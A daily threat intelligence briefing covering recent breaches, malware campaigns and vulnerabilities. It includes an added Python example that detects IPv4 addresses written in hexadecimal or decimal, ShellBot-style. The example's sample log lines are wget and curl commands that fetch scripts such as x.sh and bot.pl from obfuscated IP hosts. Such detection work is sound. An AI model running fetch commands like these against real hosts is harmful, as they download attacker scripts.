Cyware Daily Threat Intelligence


Daily Threat Briefing October 13, 2023

Is any open-source ecosystem safe from attackers? Security researchers have discovered SeroXen RAT in malicious NuGet packages, underscoring how attackers continue to exploit open-source ecosystems and the developers who use them. Meanwhile, users of instant messaging applications, such as Skype and Teams, are being advised to enforce rules, including MFA, to prevent DarkGate malware infections. This new campaign leverages compromised user accounts of the messaging applications, and security experts are not sure (as of now) how those accounts were compromised in the first place.

Apple has released iOS and iPadOS updates to fix a local privilege escalation vulnerability that's been exploited in attacks by unknown cybercriminals. Notably, many recently patched iOS flaws exploited in the wild have been linked to commercial spyware vendors.

Top Breaches Reported in the Last 24 Hours

Black Basta group cripples Edwardian Hotels

The Black Basta ransomware group claimed responsibility for a cyberattack on Edwardian Hotels London, a luxury hotel chain in the U.K. The group has posted samples of exfiltrated data on its website, including passports and bank account information as proof of the attack. The ransom amount and the full extent of the data breach have not been disclosed. Cybersecurity experts suggest that hackers often target premium hotels for ransomware attacks, seeking substantial ransoms in exchange for stolen data.

Top Malware Reported in the Last 24 Hours

DarkGate malware spreads via instant messaging

Threat actors distributed DarkGate malware using compromised instant messaging platforms Skype and Microsoft Teams from July to September, with 41% of the targets in the Americas. DarkGate is a potent loader linked to various malicious activities, including data theft, keylogging, cryptocurrency mining, and ransomware like Black Basta. Trend Micro researchers observed the developer of DarkGate advertising the malware on underground forums and offering it as malware-as-a-service to other threat actors, leading to increased activity.

Authorities update AvosLocker’s list of tools

The FBI and CISA updated their advisory on AvosLocker ransomware affiliates, revealing that they are known to use open-source utilities and legitimate software alongside custom PowerShell and batch scripts. The agencies also shared a YARA rule for detecting malware posing as a legitimate network monitoring tool. To defend against AvosLocker ransomware, organizations are recommended to implement application control mechanisms, restrict remote desktop services, apply the principle of least privilege, and keep software and code updated, among other practices.

Void Rabisu launches ROMCOM 4.0

Trend Micro experts disclosed attack campaigns by Void Rabisu actors that target Ukraine and countries supporting Ukraine. The sophisticated cyber threat group is involved in both financially motivated ransomware attacks and espionage campaigns against a wide range of entities. Recently, it employed an evolved version of its ROMCOM backdoor called ROMCOM 4.0 (aka PEAPOD) to target the Women Political Leaders (WPL) Summit and implemented a TLS-enforcing technique for added security.

ShellBot malware abuses vulnerable Linux servers

Threat actors behind the ShellBot (aka PerlBot) malware were found employing hexadecimal IP addresses to compromise poorly secured Linux SSH servers and deploy the malware. ShellBot, known for targeting servers with weak SSH credentials, is used for launching DDoS attacks and deploying cryptocurrency miners. This shift to hexadecimal IP addresses is an attempt to evade URL-based detection mechanisms. Security experts recommend using strong, regularly changed passwords to thwart attack attempts.
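The hexadecimal-IP trick above defeats detection rules that only match dotted-quad literals. The following added example (not code from the original report or from any vendor) normalizes every inet_aton-style IPv4 notation, hex, octal and decimal, whole-address or per-octet, back to dotted quad so that existing allow/deny lists still match; the log lines are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample log lines (not from the original report): fetches whose
# host is written as an IP in several evasive notations.
SAMPLE_LOG_LINES = [
    "wget http://0xc0a80105/x.sh",              # whole address as one hex number
    "curl http://0xc0.0xa8.0x01.0x05/bot.pl",   # hex per octet
    "curl http://3232235781/bot.pl",            # whole address as one decimal
    "wget http://192.168.1.5/x.sh",             # plain dotted quad
    "curl http://example.invalid/index.html",   # hostname, not an IP
]

HOST_RE = re.compile(r"https?://([^/\s:]+)")

def _parse_part(part: str) -> int:
    # int(x, 0) understands 0x (hex) and plain decimal; inet_aton also treats a
    # leading zero as octal ("010" == 8), so handle that form explicitly.
    if len(part) > 1 and part[0] == "0" and part[1].isdigit():
        return int(part, 8)
    return int(part, 0)

def normalize_ip(host: str):
    """Dotted-quad form of an IPv4 host written in any inet_aton-style notation
    (1 to 4 parts; hex, octal or decimal), or None if host is not an IP."""
    try:
        parts = [_parse_part(p) for p in host.split(".")]
    except ValueError:
        return None
    if not 1 <= len(parts) <= 4:
        return None
    # inet_aton semantics: the last part fills all remaining low-order bytes.
    remaining = 4 - (len(parts) - 1)
    if any(not 0 <= p <= 255 for p in parts[:-1]):
        return None
    if not 0 <= parts[-1] < (1 << (8 * remaining)):
        return None
    value = 0
    for p in parts[:-1]:
        value = (value << 8) | p
    value = (value << (8 * remaining)) | parts[-1]
    return str(ipaddress.IPv4Address(value))

def flag_obfuscated_ips(lines):
    """Return (line, literal_host, dotted_quad) for every URL host that is an
    IPv4 address written in a form other than plain dotted quad."""
    hits = []
    for line in lines:
        for host in HOST_RE.findall(line):
            dotted = normalize_ip(host)
            if dotted is not None and dotted != host:
                hits.append((line, host, dotted))
    return hits
```

Feed the normalized address, not the literal, to your indicator matching; in the sample all three disguised forms resolve to the same 192.168.1.5.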

NuGet packages drop SeroXen RAT

Security researchers detected a suspicious NuGet package, "Pathoschild.Stardew.Mod.Build.Config," published by the user "Disti." The package was a typosquatting attempt, disguised as a legitimate package, intended to deliver the SeroXen RAT. Disti's profile showed a pattern of download inflation, raising suspicions. The package included an installation script capable of downloading and running a highly obfuscated batch script, which ultimately executed a PowerShell script deploying the SeroXen RAT.

Top Vulnerabilities Reported in the Last 24 Hours

Indian government patches flaw exposing Aadhaar data

A security researcher discovered a bug in the West Bengal government’s e-District web portal that exposed residents' Aadhaar numbers, identity cards, fingerprints, and other sensitive information. The vulnerability allowed anyone with a login to the e-District system to access land deeds by guessing sequential deed application numbers. The researcher reported the issue to India’s CERT, and it was fixed soon after.

Apple patches actively exploited kernel flaw

Apple has released updates for iOS and iPadOS to address a local privilege escalation vulnerability (CVE-2023-42824) that has been actively exploited in attacks. While Apple did not disclose details about the attacks or the source of the vulnerability report, many recent iOS exploits have been linked to commercial spyware vendors. The patch was initially introduced in iOS 17.0.3 and is now available for devices running iOS versions prior to 16.6 via iOS 16.7.1 and iPadOS 16.7.1 updates.
